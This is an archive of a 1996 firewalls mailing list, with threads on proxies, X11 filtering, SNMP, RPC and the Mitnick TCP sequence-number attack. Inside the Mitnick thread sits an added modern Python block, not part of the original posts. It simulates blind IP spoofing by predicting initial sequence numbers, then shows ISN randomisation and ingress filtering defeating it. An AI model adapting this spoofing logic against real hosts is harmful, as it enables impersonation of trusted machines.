McKenney, mckenney@smiley.mitre.org >> >>I would like to have an update as to which commercial firewall vendors >>support or plan to support (when) an SSL and/or S-HTTP proxy. I will post >>a summary. >> >>This is the information that I have: >> >>1. TIS Gauntlet: SSL and S-HTTP proxies in next release. >>2. KarlBridge/KarlBrouter: S-HTTP proxy >>3. Milkyway Blackhole: S-HTTP >>4. SOS Brimstone: S-HTTP proxy >>5. Technologic Interceptor: S-HTTP proxy >>6. V-One SmartWall: S-HTTP proxy >> >>License versions of TIS Gauntlet will support whatever the next Gauntlet >>release supports. >> >You can add ANS Interlock to your list. >Bill > You can also add CheckPoint FireWall-1 to your list. We support both S-HTTP and SSL through our stateful inspection architecture. /emily From firewalls-owner Wed Jan 10 19:58:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA20858 for firewalls-outgoing; Wed, 10 Jan 1996 19:16:34 -0800 (PST) Received: from quito.CS.Berkeley.EDU (quito.CS.Berkeley.EDU [128.32.43.69]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA20853 for ; Wed, 10 Jan 1996 19:16:22 -0800 (PST) Received: (from daw@localhost) by quito.CS.Berkeley.EDU (8.6.11/8.6.9) id TAA26648 for firewalls@greatcircle.com; Wed, 10 Jan 1996 19:15:23 -0800 From: David A Wagner Message-Id: <199601110315.TAA26648@quito.CS.Berkeley.EDU> Subject: safe X windows proxy To: firewalls@greatcircle.com Date: Wed, 10 Jan 1996 19:15:22 -0800 (PST) X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm seeking a safe X windows proxy which will filter out dangerous X11 protocol requests from the outside, so I can use X across a firewall. The idea is simple: I want to be able to pop up a window on my (internal) X server, where the window is controlled by an X client on the external network.
I don't want the outside client to be able to issue any dangerous requests -- I don't trust it. (For example, the external client shouldn't be able to grab key strokes typed into other windows.) A simple forwarder which blindly passes on all X traffic is not what I'm looking for -- I've seen x-gw and xforward, and I can't use them, since they don't do any filtering. I searched the firewalls archives diligently: no joy. (Hope this isn't a FAQ!) I read about a safe X proxy in the USENIX '95 Security Symposium proceedings; this Xgate thing sounded like exactly what I'm looking for, but I haven't been able to find source or contact the author (Brian Kahn). Any clues? Xnest looks vaguely interesting, but I'm not sure it's secure. Comments? Are there any other possibilities? Many thanks for any info you can offer! -- Dave Wagner daw@cs.berkeley.edu From firewalls-owner Wed Jan 10 20:13:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA19588 for firewalls-outgoing; Wed, 10 Jan 1996 18:45:50 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA19583 for ; Wed, 10 Jan 1996 18:45:40 -0800 (PST) Received: from pm1-30.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA03626; Wed, 10 Jan 96 21:44:44 -0500 Date: Wed, 10 Jan 96 21:44:44 -0500 Message-Id: <9601110244.AA03626@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: frankw@in.net (Frank Willoughby) Subject: Re: I cannot read your mail Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From the desk of Wang, Qin: >JOSE LUIS VERDEGUER NAVARRO, > >I have received 3 pieces of your mails since yesterday, but they have only the >mail header. So I cannot read the contents and I do not know why. I use cc:Mail >and I suppose it's due to MIME or something else. 
> >In your mail header, >> Mime-Version: 1.0 >> Content-Type: TEXT/PLAIN; CHARSET=US=ASCII > >I do not know if the others you send mail to can read the contents > >Regards, > >Wang, Qin I think he is using one of those "transparent proxies" in his firewall. These can sometimes cause the characters in the mail to assume the same color as the background - making them transparent. Fortunately, I have an opaque proxy and the text is converted back. Not bad postings actually. 8^) 8^) 8^) All kidding aside. The same thing happened to me. I sent him a brief message telling him that his mails were arriving OK, but somehow his text didn't make the trip. Oh well. Hopefully he will get the problem fixed soon. Best Regards, Frank Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified/ The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. From firewalls-owner Wed Jan 10 20:43:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA21962 for firewalls-outgoing; Wed, 10 Jan 1996 19:40:57 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA21946 for ; Wed, 10 Jan 1996 19:40:44 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id WAA18554; Wed, 10 Jan 1996 22:38:47 -0500 Date: Wed, 10 Jan 1996 22:38:47 -0500 (EST) From: Brain21 To: Doug Hughes cc: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Doug Hughes wrote: > 2) the spoofing attack had not become common knowledge and widespread use > until this series of attacks was
demonstrated. Papers had been around > for years on the potential for this, but, as I recall, until this time, > there weren't any hacker tools that were widely known about for exploiting. I agree, but the possibility is always there. If you are in the security business, then it pays to protect against everything possible, and not to underestimate your "adversaries." > Remember, (Not that this means anything but), the CERT advisory wasn't > published until 1/23 95 and the attacks took place over Xmas of '94. > To the best of my recollection, the sequence number randomizing (which > is MUCH harder to implement than the router rules that prevent spoofing) > wasn't available until January of '95 either. > Now, CERT is usually slow about announcing such things, but, the patch > was relatively simple to implement in a router, so, you'd think that > not long after they heard about it, it would be posted. Even the sites That doesn't necessarily mean anything. I've seen advisories come out from cert WELL after other advisories have come out on other mailing lists, with patches and everything. I think my point is that Shimomura should not have underestimated Mitnick or anyone, especially since he KNEW that it was possible. Overconfidence? I don't know. Maybe Shimomura didn't even set up the security there and trusted it? I don't know. I just find it kinda ironic. 
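The exchange above contrasts two defences against the sequence-number attack it discusses: randomising initial sequence numbers on the host, and the "router rules that prevent spoofing". The following is an added example, not code from the original posts, that models the three-way handshake as a toy and shows why a predictable ISN generator lets a blind spoofer complete a connection as a trusted host while a random one does not, and how an ingress rule on the router stops the spoofed SYN before it arrives. Only the sequence-number guess is modelled; the per-connection ISN step of 128000 and all addresses are assumed constants for illustration, not figures taken from any particular system or from the incident in the thread.

```python
"""Why predictable initial sequence numbers (ISNs) make blind TCP spoofing
possible, and the two countermeasures the thread names: ISN randomisation on
the host and anti-spoofing rules on the router.  Added example; the stack is a
toy model of the handshake, and the ISN step of 128000 per connection is an
assumed constant for illustration, not taken from any particular system."""
import ipaddress
import secrets

MOD = 1 << 32
ISN_STEP = 128_000   # assumed per-connection increment of the predictable generator


class Server:
    """Minimal TCP listener: hands out an ISN on SYN, completes on a correct ACK."""

    def __init__(self, randomize_isn: bool):
        self.randomize_isn = randomize_isn
        self.counter = secrets.randbelow(MOD)  # starting point is unknown either way
        self.half_open = {}                    # src -> ISN we put in the SYN-ACK
        self.established = set()

    def _next_isn(self) -> int:
        if self.randomize_isn:
            return secrets.randbelow(MOD)
        self.counter = (self.counter + ISN_STEP) % MOD
        return self.counter

    def recv_syn(self, src: str) -> int:
        """The SYN-ACK carrying our ISN goes back to `src`; a spoofer never sees it."""
        isn = self._next_isn()
        self.half_open[src] = isn
        return isn

    def recv_ack(self, src: str, ack: int) -> bool:
        isn = self.half_open.pop(src, None)
        ok = isn is not None and ack == (isn + 1) % MOD
        if ok:
            self.established.add(src)
        return ok


def blind_spoof(server: Server, attacker: str, trusted: str) -> bool:
    """Attacker probes from its own address to learn the current ISN, then opens a
    connection as `trusted` and answers the unseen SYN-ACK with a predicted number."""
    observed = server.recv_syn(attacker)              # honest probe: SYN-ACK is visible
    server.recv_ack(attacker, (observed + 1) % MOD)
    predicted = (observed + ISN_STEP + 1) % MOD        # guess for the *next* connection
    server.recv_syn(trusted)                          # spoofed SYN; reply goes to `trusted`
    return server.recv_ack(trusted, predicted)        # spoofed ACK; True = connection accepted


INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("198.51.100.0/24")]   # constructed site prefixes


def ingress_filter(src: str, arrived_on_external: bool) -> bool:
    """Router rule: a packet arriving on the outside interface must not claim an
    inside source address.  Returns True if the packet is allowed through."""
    addr = ipaddress.ip_address(src)
    if arrived_on_external and any(addr in net for net in INTERNAL_NETS):
        return False
    return True


def run_attack(randomize_isn: bool, router_filter: bool = False) -> bool:
    attacker, trusted = "192.0.2.66", "198.51.100.7"   # constructed addresses
    if router_filter and not ingress_filter(trusted, arrived_on_external=True):
        return False                                    # spoofed SYN never reaches the host
    return blind_spoof(Server(randomize_isn), attacker, trusted)


if __name__ == "__main__":
    print("predictable ISN, no filter :", run_attack(False))
    print("random ISN, no filter      :", run_attack(True))
    print("predictable ISN + filter   :", run_attack(False, router_filter=True))
```

With the predictable generator the attack succeeds every time because one visible probe fixes the next ISN; with a random 32-bit ISN the single guess succeeds with probability about 2^-32. The ingress rule is the cheaper of the two defences, which is the point the quoted text makes about router rules versus randomisation, but it only protects against spoofing of addresses the router knows to be internal.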
Brain21 From firewalls-owner Wed Jan 10 20:58:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id TAA22538 for firewalls-outgoing; Wed, 10 Jan 1996 19:55:36 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id TAA22533 for ; Wed, 10 Jan 1996 19:55:31 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id WAA18582; Wed, 10 Jan 1996 22:53:30 -0500 Date: Wed, 10 Jan 1996 22:53:30 -0500 (EST) From: Brain21 To: Mike Shaver cc: frankw@in.net, firewalls@GreatCircle.COM, jya@pipeline.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-Reply-To: <199601101730.MAA13228@neon.ingenia.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, Mike Shaver wrote: > Thus spake Brain21: > > I would like to know this... if Shimomura is so good (and I actually > > believe that he may be) then why did he leave the r-utils enabled? > > Convenience, I would guess. > Allowing access without passwords, I don't know. That's what I figured. Maybe a little carelessness? I would not be surprised if many of the security experts out there worked on less secure machines than what they set up for their clients. Hell, my father used to do top secret work for the Dept. of Defense (he needed "Q" clearance, and needs higher now) and the office where he worked communicated to its other offices over the net. They used netcom. Not too terribly secure if you ask me. They did not use encryption. > > How do they prevent spoofing? They check IP address (and some DNS > stuff not related to IP-level spoofing) for "identification" the same Yes, my mistake (been told so many times now, as you can imagine), my mistake.
> > Do you mean "why did he allow packets to reach machines on his > network"? Internet connectivity would seem a good reason. If I recall correctly (and I may not) Mitnick fingered the machines. IF so, why was it allowed? Why were the probes inside allowed at all? On big university machines, I can see, but you don't need to allow it for EVERY department. And you don't need to sacrifice a net connection either. > > > I believe that Shimomura knew of the possibility of this type of > > attack WAY ahead of time (like months or years). > > There was a paper published by (I believe) Steve Bellovin in (I > believe) the mid-80s that discussed this type of attack. Nothing new > here... > Late '80's and Shimomura knew about it by at least 90 or 91. The attack happened in (late) 94. From firewalls-owner Wed Jan 10 21:13:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA24117 for firewalls-outgoing; Wed, 10 Jan 1996 20:20:52 -0800 (PST) Received: from montag33.residence.gatech.edu (montag33.residence.gatech.edu [199.77.171.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA24095 for ; Wed, 10 Jan 1996 20:20:46 -0800 (PST) Received: (from brain21@localhost) by montag33.residence.gatech.edu (8.6.12/8.6.9) id XAA18642; Wed, 10 Jan 1996 23:05:33 -0500 Date: Wed, 10 Jan 1996 23:05:33 -0500 (EST) From: Brain21 To: scott_rickard@mc.xerox.com cc: firewalls@greatcircle.com Subject: Re: your mail Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I don't buy it. First off, the CIA wouldn't be involved (well, ok, at least not legally...). This is mainly the SS's territory, and the FBI sometimes gets involved as well. I doubt that it was a serious enough thing that the NSA would get involved too. Let's assume that the CIA or NSA *were* involved via Shimomura, as you have implied may be a possibility.
I doubt that Shimomura would have given such a detailed account of the attacks so quickly. It would be more characteristic to keep it a little quiet, don't you think? It just does not sit well with me at all. BTW, did cypherpunks mention anything about how Mitnick got root on toad.com to do the spoofing? That's where Shimomura said the initial probes came from... Brain21 From firewalls-owner Wed Jan 10 21:28:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA23330 for firewalls-outgoing; Wed, 10 Jan 1996 20:10:08 -0800 (PST) Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA23324 for ; Wed, 10 Jan 1996 20:09:55 -0800 (PST) From: mail06823@pop.net Received: from alterdial.UU.NET by relay3.UU.NET with SMTP id QQzxzs23004; Wed, 10 Jan 1996 23:08:58 -0500 (EST) Received: from 205.230.245.90 by alterdial.UU.NET with SMTP id QQzxzs23914; Wed, 10 Jan 1996 23:08:50 -0500 Date: Wed, 10 Jan 1996 23:08:50 -0500 Message-Id: MIME-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit Subject: Survey on Dangers of SNMP / Respond with your 2 cents on the survey To: firewalls@greatcircle.com X-Mailer: SPRY Mail Version: 04.00.06.17 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I would appreciate it if you can take a moment to respond to my email address (not the whole list) to "vote" on if you think SNMP traffic should pass through a Firewall. Your response should be simple (Yes, No, Maybe based on a condition), or better still, please share your stories and experiences on the dangers. I understand that SNMP is great for management, but I do not want to jeopardize my company so that I can get tons of management information that I may not need (I would argue that paring down services and allowing the Firewall architecture to do its job may be a viable alternative).
I do not have a requirement to use my existing Enterprise Network Management system. Thanks for your responses, and I will post a synopsis when I receive enough results to be meaningful. Thanks. From firewalls-owner Wed Jan 10 22:28:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id VAA27245 for firewalls-outgoing; Wed, 10 Jan 1996 21:09:14 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id VAA27228 for ; Wed, 10 Jan 1996 21:08:59 -0800 (PST) Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id QAA08009 for ; Thu, 11 Jan 1996 16:05:48 +1100 (EST) Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id QAA01893 for firewalls@greatcircle.com; Thu, 11 Jan 1996 16:08:29 +1100 From: Jas (Matthew K) Message-Id: <199601110508.QAA01893@maverick.itd.uts.edu.au> Subject: Re: Firewalls-Digest V5 #14 To: firewalls@greatcircle.com (Firewalls Mailing List) Date: Thu, 11 Jan 1996 16:08:28 +1100 (EST) In-Reply-To: <199601110236.VAA09986@switchblade.v-one.com> from "Marcus J. Ranum" at Jan 10, 96 09:36:05 pm X-Gcb: -----BEGIN GEEK CODE BLOCK----- X-Gcb: Version: 3.1 X-Gcb: GAT/M/CS d-(++) s++:-- a-(?) C+++$ UVS++++$ P+++ L+ E++ W++ N++ X-Gcb: !o K+ w--- O+ M+ V-- PS+ PE+ Y+ PGP++ t+ 5+ X++ R tv- b++ DI+ X-Gcb: D+ e h- r !y X-Gcb: ------END GEEK CODE BLOCK------ X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #849482 or 849482@pager.link.com.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Marcus J. Ranum wrote this... 
> To make matters worse a lot of UDP applications (most > notably Sun RPC, and RealAudio) run on arbitrary ports, which > makes them even harder to sensibly track. A lot of folks are > comfortable letting UDP port 53 (DNS) into their firewalls. > DNS is pretty well-known and well-behaved. Not so RPC. well the client controls what protocol to connect with RPC (on the proviso that the server offers that protocol). almost all SunRPC programs that are compiled for use of IP offer both TCP and UDP (you have to go out of your way to stop TCP from working). some Sun offered RPC servers will only offer UDP, but most will offer both. and another beside, you cant pump more than 8Kb per request using UDP, so most RPC programs that pump large amounts of data will always be TCP. i have programmed in RPC for a number of years now, and i always use TCP for my RPC work. Matt -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Data Network Administrator Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. 
-- Rob Pike From firewalls-owner Wed Jan 10 23:28:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA06194 for firewalls-outgoing; Wed, 10 Jan 1996 23:12:09 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA06178 for ; Wed, 10 Jan 1996 23:12:02 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id CAA16906; Thu, 11 Jan 1996 02:01:20 -0500 Date: Thu, 11 Jan 1996 02:01:02 -0500 (EST) From: Rabid Wombat To: RDA cc: firewalls@GreatCircle.COM Subject: RE: firewalls reviews/comparisons In-Reply-To: <9600108212.AA821296054@etf.etf.it> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jan 1996, RDA wrote: > > ______________________________ Forward Header __________________________________ > Subject: RE: firewalls reviews/comparisons > Author: Neil at INTERNET > Date: 1/9/96 3:41 PM > > > > >> 2) I've been searching for information on the best firewall to purchase > >for > our > >> needs and have not come across any reviews/comparisons on which is > >> best (I have a list of all of the firewalls available and their > >descriptions > but > >> not any comparisons). Anyone know of any reviews and where to find > >them? > We require a firewall which could support a very high > >throughput so > we would probably require a hardware-based firewall. > >Configuring our > >> front-end router to act as a firewall isn't a practical option. > >Any > information would be > >> appreciated. Thanks, > > >There was a review of commercial firewalls in (I think) Byte or something > >like that a little while ago, the machines being the TIS Gauntlet, Border > >Ware and Firewall 1. Perhaps someone with a better memory than me can > >clarify.
> > >> Brian Hescock > >> hescockb@86aw4.ramstein.af.mil > > Hello, just for info, the Byte issue mentioned is from April '95 under the > 'Network security' section. As a newbie myself, I found it quite useful. > > I'm hoping to set up a firewall based on NT 3.51 which will also act as > a WWW proxy. Does anyone have any inside info on the expected > release/functionalities of the Microsoft Catapult package ? Since most > of the clients on the net I need to protect are running IPX (some run > both IPX and TCP/IP), I would like to know the opinion of the experts on > the possibility of a Web proxy machine also doing a 'protocol > conversion'. i.e. surely it's theoretically possible for the WWW clients > on the protected net to connect to the proxy over IPX (or Netbeui) and > for the proxy to go out of a second card on TCP/IP to the Internet ??? > I would imagine that blocking all TCP/IP through the firewall in this > way would go a long way to protecting sensitive UNIX hosts on the > inside. Has this been done before ? Am I seriously misguided ? Thanks > for any opinions. You might want to look into the Firefox Novix gateway. It converts IPX/SPX to TCP/IP, and can allocate IP addresses on a dynamic or static basis. It runs on Novell fileservers, which I assume you have, since you're running IPX. It also runs on Novell's MPR if you don't want to impact your servers. I don't know if they have an NT version - I haven't been keeping close tabs on them. Phone number is 800-230-6090/408-321-8344 or info@firefox.com. (I have no commercial interest in this company) - Wombat > > Richard Anstey. > > > ============================================================================= > ======== E-mail messages from the European Training Foundation ========= > ======== shall not in any way be legally binding. 
========= > ============================================================================= > From firewalls-owner Wed Jan 10 23:43:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA07125 for firewalls-outgoing; Wed, 10 Jan 1996 23:42:08 -0800 (PST) Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA07120 for ; Wed, 10 Jan 1996 23:42:04 -0800 (PST) Received: by hosaka.smallworks.com (5.x/SMI-SVR4) id AA07116; Thu, 11 Jan 1996 01:30:14 -0600 Date: Thu, 11 Jan 1996 01:30:14 -0600 From: jim@SmallWorks.COM (Jim Thompson) Message-Id: <9601110730.AA07116@hosaka.smallworks.com> To: dannyc@gmap.leeds.ac.uk, firewalls@GreatCircle.COM Subject: Re: Firewall design - routers and commercial kit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Seems to me the obvious way (sort of) to do this is to use a screened subnet >arrangement. Ok .. fine. Am I duplicating kit doing this ? That is, by using >an exterior and interior router to create a screened net off which would hang >the commercial firewall etc, am I duplicating the routing function of the >commercial firewall or don't they have the same level of control over routing >as a CISCO would for example ? Some firewalls do. (NetGate and Firewall-1 do.) Actually, you can get better control with some of these than you can with a Cisco. For instance, you can't filter on ICMP type and code with Cisco's access lists... 
Jim From firewalls-owner Thu Jan 11 02:12:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA12141 for firewalls-outgoing; Thu, 11 Jan 1996 01:50:24 -0800 (PST) Received: from ibmmail.COM (ibmmail.com [199.171.26.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id BAA12136 for ; Thu, 11 Jan 1996 01:50:17 -0800 (PST) From: gblolmxb@ibmmail.com Message-Id: <199601110950.BAA12136@miles.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 0781; Thu, 11 Jan 96 04:48:27 EST Date: Thu, 11 Jan 1996 04:48:00 EST To: firewalls@greatcircle.com MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: RE: MITNICK & THE TCP SEQUENCE NUMBER ATTACK ON SHIMOMURA (L Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Scott Rickard wrote >>Globally, the intelligence and counterintelligence businesses are a multi-trillion dollar industry I think this is somewhat of an over-exaggeration, certainly for the UK where the latest figures put intelligence spending at around 1% of Government spending, i.e. less than 0.5% of the GNP (which is around £700 billion). As an interesting aside, this figure has not gone down despite the advent of 'peace' in N. Ireland. Mark.
From firewalls-owner Thu Jan 11 02:16:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA12374 for firewalls-outgoing; Thu, 11 Jan 1996 01:56:22 -0800 (PST) Received: from myall.awadi.com.au (myall.awadi.com.AU [150.207.2.65]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA12369 for ; Thu, 11 Jan 1996 01:56:13 -0800 (PST) Received: from bunya.awadi ([150.207.2.63]) by myall.awadi.com.au (8.7.1/8.7.1) with SMTP id UAA04358; Thu, 11 Jan 1996 20:25:10 +1030 (CST) Received: from mallee.awadi by bunya.awadi (5.x/SMI-SVR4) id AA27779; Thu, 11 Jan 1996 20:25:05 +1030 From: blymn@awadi.com.au (Brett Lymn) Message-Id: <9601110955.AA27779@bunya.awadi> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) To: brain21@montag33.residence.gatech.edu (Brain21) Date: Thu, 11 Jan 1996 20:25:04 +1030 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Brain21" at Jan 10, 96 10:53:30 pm X-Mailer: ELM [version 2.4 PL2] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to Brain21: > >Hell, my father used >to do top secret work for the Dept. of Defense (he needed "Q" clearance, >and needs higher now) and the office where he worked communicated to its >other offices over the net. They used netcom. Not too terribly secure >if you ask me. They did not use encryption. > Ummmm I suspect that things may be a bit different to that which you have implied. Even in an organisation handling secret material a lot of the day to day running of the place is not classified - you know, things like when the next barbeque (or cook-out or whatever word you guys use for the process of carbonising meat over a flame outdoors whilst getting drunk.... :*) will be or getting someone to order more pens for the stationery cabinet - such things are not and should not be classified.
I bet all the secret documents/matters were not sent over the net (though I could be wrong....) - it is certainly the way things work here. -- Brett Lymn, Computer Systems Administrator, AWA Defence Industries =============================================================================== "Upgrading your memory gives you MORE RAM!" - ad in MacWAREHOUSE catalogue. From firewalls-owner Thu Jan 11 02:59:02 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA14390 for firewalls-outgoing; Thu, 11 Jan 1996 02:45:50 -0800 (PST) Received: from archimedes.vislab.navy.mil (archimedes.chinalake.navy.mil [129.131.31.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id CAA14385 for ; Thu, 11 Jan 1996 02:45:40 -0800 (PST) Received: from archimedes.vislab.navy.mil (parcival.vislab.navy.mil [129.131.31.12]) by archimedes.vislab.navy.mil (current-1701B/current-CL-CL) with ESMTP id CAA18112 for ; Thu, 11 Jan 1996 02:46:21 -0800 Posted-Date: Thu, 11 Jan 1996 02:46:21 -0800 Message-Id: <199601111046.CAA18112@archimedes.vislab.navy.mil> To: firewalls@greatcircle.com Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) In-reply-to: Your message of "Thu, 11 Jan 1996 20:25:04 +1030." <9601110955.AA27779@bunya.awadi> Date: Thu, 11 Jan 1996 02:46:14 -0800 From: Benjamin Allan Smith Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Brain21 wrote: >Hell, my father used >to do top secret work for the Dept. of Defense (he needed "Q" clearance, >and needs higher now) and the office where he worked communicated to its >other offices over the net. They used netcom. Not too terribly secure >if you ask me. They did not use encryption. I highly doubt that. Every machine that I have seen on base which has Secret (or higher) data is not allowed to have *any* physical connection with the internet (the mjr 100% sure firewall to the internet--cut the wires).
Once someone inadvertently emailed the classified name of a project over a network connected to the Internet. The day was spent completely wiping all of the hard drives on all of the machines that might have received that email (3 complete overwrites with random data if I recall correctly) and then the OS and data were restored from the previous night's backups. A head rolled for that error.

So if all that effort was made over a single word, I *highly* doubt that your father used netcom to discuss classified matters.

Ben
-------------------------------------------------------------------------------
Benjamin Smith------------bens@vislab.navy.mil---------1972 Land Rover SIII 88
Science Applications International Corporation
Naval Air Warfare Center, Weapons Division, China Lake
"...If I were running such a contest, I would specifically eliminate any entry from Ben involving driving the [Land] Rover anywhere. He'd drive it up the Amazon basin for a half can of Jolt and a stale cookie..." --Kevin Archie

From firewalls-owner Thu Jan 11 03:14:02 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA15242 for firewalls-outgoing; Thu, 11 Jan 1996 03:02:06 -0800 (PST)
Received: from sheeba.rcooper.the-wire.com (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA15228 for ; Thu, 11 Jan 1996 03:01:58 -0800 (PST)
Received: from rwcooper.rcooper.the-wire.com ([205.206.47.2]) by sheeba.rcooper.the-wire.com (post.office MTA v1.9.1 evaluation license) with SMTP id AAA217; Thu, 11 Jan 1996 05:59:47 -0500
Received: by rwcooper.rcooper.the-wire.com with Microsoft Mail id <01BAE04E.69CB1DE0@rwcooper.rcooper.the-wire.com>; Thu, 11 Jan 1996 17:58:29 -0500
Message-ID: <01BAE04E.69CB1DE0@rwcooper.rcooper.the-wire.com>
From: Russ Cooper
To: RDA , "'Rabid Wombat'"
Cc: "firewalls@GreatCircle.COM"
Subject: RE: firewalls reviews/comparisons
Date: Thu, 11 Jan 1996 17:58:27 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

First of all, IPX does not mean Netware servers any more. Microsoft uses IPX as their strategic transport of choice within their internal networks, and actively promotes its use on customer NT-based networks, with no thought to the presence of Netware servers. Much of the functionality of NT's domain systems is seriously hampered by TCP/IP yet robust with IPX/SPX.

Firefox's Novix (www.firefox.com) is a great gateway product if you do have a Novell server, but it is not a Firewall. It does nothing, for example, to protect two privately connected networks from each other, where a firewall could handle those risks.

Anyway, look to Raptor (www.raptor.com) to make an NT-based Eagle announcement on Monday. That will be the first true NT-based Firewall.

As for Catapult from Microsoft, I'm still under NDA, so it's still not talked about.

Cheers,
Russ Cooper
Sr. Internet Integration Engineer
SHL/Computer Innovations
rcooper@the-wire.com -- rwcooper@shl.com
"can someone tell me where to go today to get the money to go to where I want to go today"

From firewalls-owner Thu Jan 11 04:14:03 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA17330 for firewalls-outgoing; Thu, 11 Jan 1996 04:00:12 -0800 (PST)
